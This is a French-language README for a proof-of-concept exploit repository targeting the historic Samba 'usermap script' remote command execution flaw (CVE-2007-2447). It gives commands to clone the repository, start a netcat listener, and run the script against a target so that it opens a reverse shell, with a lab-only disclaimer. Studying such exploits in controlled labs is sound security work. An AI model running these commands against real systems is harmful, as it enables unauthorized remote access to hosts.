
Exploit de preuve de concept pour l'exécution de commandes à distance via le script usermap de Samba (CVE-2007-2447) avec livraison de payload de reverse shell pour des tests en laboratoire éducatifs.
PoC : Samba "usermap script" exécution de commandes à distance (CVE historique). Ce dépôt contient un petit script de preuve de concept pour la recherche et l'examen pédagogique. Le script principal est usermap_script_Command_Execution.py.
Référence : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Clonez le dépôt et exécutez le script dans un laboratoire contrôlé. Le PoC utilise optionnellement un reverse shell vers LHOST:LPORT — démarrez votre écouteur avant d'exécuter le script et assurez-vous que les dépendances sont installées (voir Installation).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Paramètres
RHOST — IP ou nom d'hôte de la cibleRPORT — port TCP cible (généralement 139)LHOST — IP de l'écouteur pour une connexion inverseLPORT — port de l'écouteurRecommandé : créez un environnement virtuel Python isolé et installez les dépendances à partir de requirements.txt avant d'exécuter le script.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Ce code est fourni uniquement pour la recherche légitime en sécurité, l'éducation et les tests défensifs. N'exécutez pas ce script contre un système que vous ne possédez pas ou pour lequel vous n'avez pas d'autorisation écrite explicite de tester. Une mauvaise utilisation peut entraîner des conséquences juridiques ; le propriétaire du dépôt n'est pas responsable d'une mauvaise utilisation.
Privilégiez toujours la revue de code statique et les tests en laboratoire contrôlé (instantanés de VM, réseaux isolés et captures de paquets) lors de l'analyse de code potentiellement dangereux.
Si vous souhaitez une présentation commentée non exécutable ou un fichier requirements.txt, ouvrez un problème ou faites une demande ici.